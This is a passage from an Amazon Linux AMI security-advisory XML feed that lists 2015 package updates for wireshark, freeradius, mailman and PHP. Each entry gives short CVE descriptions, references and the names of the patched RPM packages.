arch="noarch"><filename>Packages/httpd24-manual-2.4.16-1.62.amzn1.noarch.rpm</filename></package><package name="httpd24" version="2.4.16" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.16-1.62.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.16" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.16-1.62.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.16" release="1.62.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.16-1.62.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" 
version="2.4.16" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.16-1.62.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.16" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.16-1.62.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.16" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.16-1.62.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.16" release="1.62.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.16-1.62.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.16" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.16-1.62.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.16" release="1.62.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.16-1.62.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.16" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.16-1.62.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.16" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.16-1.62.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.16" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.16-1.62.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-580</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-580: medium priority package update for wireshark</title><issued date="2015-08-17 12:29:00" /><updated date="2015-08-17 12:29:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2191:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2015-2189:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2015-0564:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2015-0562:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2014-8714:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2014-8713:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2014-8712:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2014-8711:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2014-8710:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8710" title="" id="CVE-2014-8710" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8711" title="" id="CVE-2014-8711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8712" title="" id="CVE-2014-8712" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8713" title="" id="CVE-2014-8713" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8714" title="" id="CVE-2014-8714" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0562" title="" id="CVE-2015-0562" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0564" title="" id="CVE-2015-0564" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2189" title="" id="CVE-2015-2189" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2191" title="" id="CVE-2015-2191" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1460.html" title="" id="RHSA-2015:1460" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="wireshark-debuginfo" version="1.8.10" release="17.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-debuginfo-1.8.10-17.19.amzn1.x86_64.rpm</filename></package><package name="wireshark" version="1.8.10" release="17.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-1.8.10-17.19.amzn1.x86_64.rpm</filename></package><package name="wireshark-devel" version="1.8.10" release="17.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-devel-1.8.10-17.19.amzn1.x86_64.rpm</filename></package><package name="wireshark-debuginfo" version="1.8.10" release="17.19.amzn1" epoch="0" 
arch="i686"><filename>Packages/wireshark-debuginfo-1.8.10-17.19.amzn1.i686.rpm</filename></package><package name="wireshark" version="1.8.10" release="17.19.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-1.8.10-17.19.amzn1.i686.rpm</filename></package><package name="wireshark-devel" version="1.8.10" release="17.19.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-devel-1.8.10-17.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-581</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-581: medium priority package update for freeradius</title><issued date="2015-08-17 12:30:00" /><updated date="2015-08-17 12:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2015:
A stack-based buffer overflow was found in the way the FreeRADIUS rlm_pap module handled long password hashes. An attacker able to make radiusd process a malformed password hash could cause the daemon to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2015" title="" id="CVE-2014-2015" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1287.html" title="" id="RHSA-2015:1287" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="freeradius-utils" version="2.2.6" release="4.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-utils-2.2.6-4.15.amzn1.x86_64.rpm</filename></package><package name="freeradius-mysql" version="2.2.6" release="4.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-mysql-2.2.6-4.15.amzn1.x86_64.rpm</filename></package><package name="freeradius-debuginfo" version="2.2.6" release="4.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-debuginfo-2.2.6-4.15.amzn1.x86_64.rpm</filename></package><package name="freeradius-perl" version="2.2.6" release="4.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-perl-2.2.6-4.15.amzn1.x86_64.rpm</filename></package><package name="freeradius-postgresql" version="2.2.6" release="4.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-postgresql-2.2.6-4.15.amzn1.x86_64.rpm</filename></package><package name="freeradius-unixODBC" version="2.2.6" release="4.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-unixODBC-2.2.6-4.15.amzn1.x86_64.rpm</filename></package><package name="freeradius-python" version="2.2.6" release="4.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-python-2.2.6-4.15.amzn1.x86_64.rpm</filename></package><package name="freeradius-krb5" version="2.2.6" release="4.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-krb5-2.2.6-4.15.amzn1.x86_64.rpm</filename></package><package name="freeradius" version="2.2.6" release="4.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-2.2.6-4.15.amzn1.x86_64.rpm</filename></package><package name="freeradius-ldap" 
version="2.2.6" release="4.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-ldap-2.2.6-4.15.amzn1.x86_64.rpm</filename></package><package name="freeradius-mysql" version="2.2.6" release="4.15.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-mysql-2.2.6-4.15.amzn1.i686.rpm</filename></package><package name="freeradius-utils" version="2.2.6" release="4.15.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-utils-2.2.6-4.15.amzn1.i686.rpm</filename></package><package name="freeradius-debuginfo" version="2.2.6" release="4.15.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-debuginfo-2.2.6-4.15.amzn1.i686.rpm</filename></package><package name="freeradius-unixODBC" version="2.2.6" release="4.15.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-unixODBC-2.2.6-4.15.amzn1.i686.rpm</filename></package><package name="freeradius" version="2.2.6" release="4.15.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-2.2.6-4.15.amzn1.i686.rpm</filename></package><package name="freeradius-perl" version="2.2.6" release="4.15.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-perl-2.2.6-4.15.amzn1.i686.rpm</filename></package><package name="freeradius-postgresql" version="2.2.6" release="4.15.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-postgresql-2.2.6-4.15.amzn1.i686.rpm</filename></package><package name="freeradius-ldap" version="2.2.6" release="4.15.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-ldap-2.2.6-4.15.amzn1.i686.rpm</filename></package><package name="freeradius-krb5" version="2.2.6" release="4.15.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-krb5-2.2.6-4.15.amzn1.i686.rpm</filename></package><package name="freeradius-python" version="2.2.6" release="4.15.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-python-2.2.6-4.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" 
type="security" from="linux-security@amazon.com"><id>ALAS-2015-582</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-582: medium priority package update for mailman</title><issued date="2015-08-17 12:31:00" /><updated date="2015-08-17 12:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2775:
It was found that mailman did not sanitize the list name before passing it to certain MTAs. A local attacker could use this flaw to execute arbitrary code as the user running mailman.
CVE-2002-0389:
It was found that mailman stored private email messages in a world-readable directory. A local user could use this flaw to read private mailing list archives.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0389" title="" id="CVE-2002-0389" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2775" title="" id="CVE-2015-2775" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1417.html" title="" id="RHSA-2015:1417" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mailman-debuginfo" version="2.1.15" release="21.20.amzn1" epoch="3" arch="x86_64"><filename>Packages/mailman-debuginfo-2.1.15-21.20.amzn1.x86_64.rpm</filename></package><package name="mailman" version="2.1.15" release="21.20.amzn1" epoch="3" arch="x86_64"><filename>Packages/mailman-2.1.15-21.20.amzn1.x86_64.rpm</filename></package><package name="mailman" version="2.1.15" release="21.20.amzn1" epoch="3" arch="i686"><filename>Packages/mailman-2.1.15-21.20.amzn1.i686.rpm</filename></package><package name="mailman-debuginfo" version="2.1.15" release="21.20.amzn1" epoch="3" arch="i686"><filename>Packages/mailman-debuginfo-2.1.15-21.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-583</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-583: medium priority package update for php54</title><issued date="2015-08-17 12:39:00" /><updated date="2016-03-16 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-6833:
A flaw was found in the way PHP&#039;s Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.
1283702:
CVE-2015-6833 php: Files from archive can be extracted outside of destination directory using phar
CVE-2015-6832:
A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.
1256322:
CVE-2015-6832 php: dangling pointer in the unserialization of ArrayObject items
CVE-2015-6831:
A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.
1256290:
CVE-2015-6831 php: Use After Free Vulnerability in unserialize()
CVE-2015-5590:
1245242:
CVE-2015-5590 php: buffer overflow and stack smashing error in phar_fix_filepath
CVE-2015-5589:
1245236:
CVE-2015-5589 php: segmentation fault in Phar::convertToData on invalid file
CVE-2015-3152:
1217506:
CVE-2015-3152 mysql: use of SSL/TLS can not be enforced in mysql client library (oCERT-2015-003, BACKRONYM)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3152" title="" id="CVE-2015-3152" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5589" title="" id="CVE-2015-5589" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5590" title="" id="CVE-2015-5590" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6831" title="" id="CVE-2015-6831" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6832" title="" id="CVE-2015-6832" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6833" title="" id="CVE-2015-6833" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-pspell" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.44" release="1.72.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php54-gd-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" 
version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.44" release="1.72.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php54-odbc-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.44" release="1.72.amzn1" 
epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.44" release="1.72.amzn1" 
epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.44-1.72.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-584</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-584: medium priority package update for php55</title><issued date="2015-08-17 12:41:00" /><updated date="2016-03-16 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-6833:
A flaw was found in the way PHP&#039;s Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.
1283702:
CVE-2015-6833 php: Files from archive can be extracted outside of destination directory using phar
CVE-2015-6832:
A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.
1256322:
CVE-2015-6832 php: dangling pointer in the unserialization of ArrayObject items
CVE-2015-6831:
A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.
1256290:
CVE-2015-6831 php: Use After Free Vulnerability in unserialize()
CVE-2015-5590:
1245242:
CVE-2015-5590 php: buffer overflow and stack smashing error in phar_fix_filepath
CVE-2015-5589:
1245236:
CVE-2015-5589 php: segmentation fault in Phar::convertToData on invalid file
CVE-2015-3152:
1217506:
CVE-2015-3152 mysql: use of SSL/TLS can not be enforced in mysql client library (oCERT-2015-003, BACKRONYM)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3152" title="" id="CVE-2015-3152" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5589" title="" id="CVE-2015-5589" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5590" title="" id="CVE-2015-5590" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6831" title="" id="CVE-2015-6831" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6832" title="" id="CVE-2015-6832" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6833" title="" id="CVE-2015-6833" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-xmlrpc" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.28" release="1.106.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php55-pspell-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" 